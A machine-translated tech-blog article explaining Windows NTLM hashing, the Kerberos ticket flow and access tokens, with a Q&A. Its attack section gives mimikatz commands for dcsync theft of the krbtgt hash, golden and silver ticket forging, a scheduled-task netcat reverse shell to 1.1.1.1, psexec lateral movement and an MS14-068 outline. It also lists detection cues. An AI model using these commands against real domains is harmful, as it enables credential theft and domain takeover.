Shulou(Shulou.com)06/03 Report--

This article mainly introduces "what is the authentication protocol of windows". In the daily operation, I believe that many people have doubts about what the authentication protocol of windows is. The editor consulted all kinds of materials and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the doubts of "what is the authentication protocol of windows?" Next, please follow the editor to study!

I. NTLM Certification

First, take a look at the process of generating NTLM hash:

NTLM hash: password-> hexadecimal code-> Unicode conversion-> MD4 encryption-> get NTLM Hash

Give an example

Admin-> hex (hexadecimal encoding) = 61646d696e

61646d696e-> Unicode = 610064006d0069006e00

610064006d0069006e00-> MD4 = 209c6174da490caeb422f3fa5a7ae634

In order to ensure the confidentiality of NTLM hash, NTLM hash will not be transmitted directly in the authentication process. There are two types of NTLM certification. Details are as follows:

NTLM local authentication: the client sends identity information such as user name, the server generates random 16 challenge and sends it to the client, and the client uses NTLM hash encryption challenge to send it to the server. The server finds the NTLM hash through the user name and then encrypts the comparison between the challenge and the client. If the comparison is successful, the authentication is successful.

NTLM network authentication: this situation applies to the scenario where the domain account is used to log in, when the server does not have a user's hash. So the difference is that the server will send the user information, challenge, and the information returned by the client to the domain control, and the domain control will authenticate and return the result. The flow chart is shown in the following figure:

II. Kerberos certification

NTLM protocol is relatively simple, kerberos authentication is more complex, first of all, introduce several concepts.

Kerberos certification is done by three parties, namely client, server and KDC (Key Distribution Center).

KDC is composed of two services, AS (Authentication Service) and TGS (Ticket Granting Service).

AS is used to generate TGT (Ticket Granting Ticket) for client, TGS is used to generate ST (service ticket) of a service for client, TGT is used to obtain temporary credentials of ST, and ST is a ticket that must be used to access a service.

The first step is the interaction between client and AS

Client send: user name + user password encryption (user information, timestamp, etc.)

AS: find the user password according to the user name, decrypt the user information and event stamp, verify that the authentication is successful, and then randomly generate a session key

AS send: user password encryption (session key) + TGT (i.e. krbtgt encryption (user information, session key))

Note: the only thing users in TGT don't know is krbtgt's password hash, so with this hash, they can forge their own TGT, which is the so-called golden ticket.

Step 2: client interacts with TGS

Client send: session key encryption (user information, timestamp, etc.) + service name to be accessed + TGT

TGS: use krbtgt password to decrypt TGT, get session key to decrypt user information, and compare it with user information in TGS. Generate random server session key after successful authentication

TGS send: session key encryption (server session key) + ST (i.e. corresponding server password encryption (user information, server session key))

Note: the only thing users in ST don't know is server's password hash, so with this hash, they can forge their own ST, the so-called silver bill.

The third step is the interaction between client and server

Client send: server session key encryption (user information, timestamp, etc.) + ST

Server: use your own password to decrypt ST to obtain server session key, and then compare the user information obtained by server session key decryption with the user information in ST. The authentication is successful.

The flow chart is shown in the following figure:

In the above process, the key used in each encryption is basically different, which is a good practice of one encryption at a time.

Kerberos authentication attack method:

The following is a brief talk about the forgery and use of gold bills, using the tool mimikatz.

1. Get ntlm hash and other information on the domain control

Lsadump::dcsync / domain: [domain name] / user:krbtgt

two。 Generate gold bill

Privilege::debug # right kerberos::golden / user:administrator / domain: [domain name] / sid: [domain sid] / krbtgt: [krbtgt hash] / ptt # generate ticket and import # kerberos::golden / user: domain user to be forged (we generally write domain administrator) / domain: domain name / sid: sid value of domain / hash / ptt of krbtgt:krbtgt

3. Follow-up utilization

① enumerates disk files on domain control

Net use\ AD01.test.comdir\\ AD01.test.com\ c$

② bounce shell

Nc.exe-lvp 9999 # listening port copy C:\ Users\ Administrator\ Desktop\ nc.exe\\ AD01.test.com\ c$\ nc.exe# copy netcat to the target host schtasks / create / tn "ncshell" / tr "c:\ nc.exe 1.1.1.1 9999-e cmd.exe" / sc once / st 19:13:00 / sd 2021-04-13 / s AD01.test.com / RU test\ admin # bounce shell

③ uses psexec to execute commands directly:

PsExec64.exe\\ AD01.test.com cmd.exe

The use of silver bills is basically similar:

Kerberos::golden / domain:test.com / sid: [sid] / target: computer name. Test.com / rc4: [server hash] / service:cifs / user:administrator / pttMS14-068principles

Here is a brief introduction to the famous loophole MS14-068in bill attacks.

Take advantage of the premise:

1. The domain controller does not have the patch (KB3011780) of MS14-068,

two。 Take down a computer that joins the domain

3. Have the domain user password and Sid of the computer in this domain

Background information:

In fact, there is no permission information for client in the kerberos protocol, and server does not know what permissions client has. So you have PAC (privilege attribute certificate), the privilege attribute certificate, as part of TGT.

In order to ensure the legitimacy of PAC itself, it has two signatures with krbtgt password as key.

Attack process:

The client requests TGT, which does not contain PAC, and gets the TGT that does not contain PAC

The client forges PAC, which is generally forged as domain administrator information, and then casually signs it with MD5.

The client requests ST, sends TGT, and specifies that PAC is included in the request (specifically in the REQ_BODY of TGS_REQ), and that the signature method is MD5.

After receiving the request, TGS decrypts the TGT without PAC, and then verifies the external PAC according to the specified signature algorithm, that is, MD5. After the verification is successful, it will return to client a new TGT containing PAC.

This allows client to get a TGT that contains the specified user rights

Ticket attack detection:

1. According to the tool characteristics, mimikatz is similar to kekeo, and the characteristics of attack parameters are very obvious, which can be detected according to the characteristics such as "kerberos::" in the process creation log.

two。 Microsoft's ATA can be tested according to the validity period of ticket. TGT is valid for ten hours by default, but mimikatz is generated for ten years by default (controlled by optional parameter / endin)

3. Token (token)

Token is an object that describes the context of a process or thread safety. When different users log in to the computer, an Access Token is generated, and the Token is constantly copied when the user creates a process or thread. In general, when a user double-clicks to run a program, it will copy the Access Token of "explorer.exe". When the user logs out, the system will switch the primary token to an impersonation token, and the token will not be cleared until the machine is rebooted.

Token contents:

Security identifier (SID) of the user account

SID of the group to which the user belongs

Login SID used to identify the current login session

List of permissions owned by a user or user group

Owner SID

SID of the primary group

Access control list

The source of the access token

Is the token the primary token or the impersonation token

Restrict the optional list of SID

Current simulation level

Other statistics

IV. Answer questions

1. How is the krbtgt account created on the domain control? Do you have a default random password or a random password? How to modify it?

Krbtgt is generated automatically when the domain control is created, and a password is randomly assigned to it by the system. To change the password is to go to the Active Directory user and computer, find the relevant user, reset password, and then enter the specified password. The specified password is not important because the system automatically generates a strong password independent of the specified password.

2. When do I use token? When do you use kerberos? And what's the relationship between them?

Token is used locally and kerberos is used for network authentication. There is an authentication id field in token, which is associated with the login session, and then the login session is associated with the cache credentials. When you log in to other hosts using token, you will use the cache credentials to log in to other machines.

Network login does not cache credentials. For example, if net use goes to the target host, hash will not be found on the target host, and the available token can not be found through incognito, but the plaintext account password can be seen on the local host.

3. How to make further use of the token of the domain control process after the victim host forged it?

Commands can be executed directly by net use or psexec.

4. Since the NTLM authentication of a domain account is completed on the domain control, why can I still get NTLMhash after logging in?

If you log in in RDP mode, you enter the plaintext password in the process on the remote computer. The first part of the process is similar to local login, that is, winlogon.exe-> receive user input-> lsass.exe. That is, the target machine of RDP receives the local account and processes it into hash, and then the RDP target machine uses this hash to authenticate on the domain control.

At this point, the study on "what is the authentication protocol of windows" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.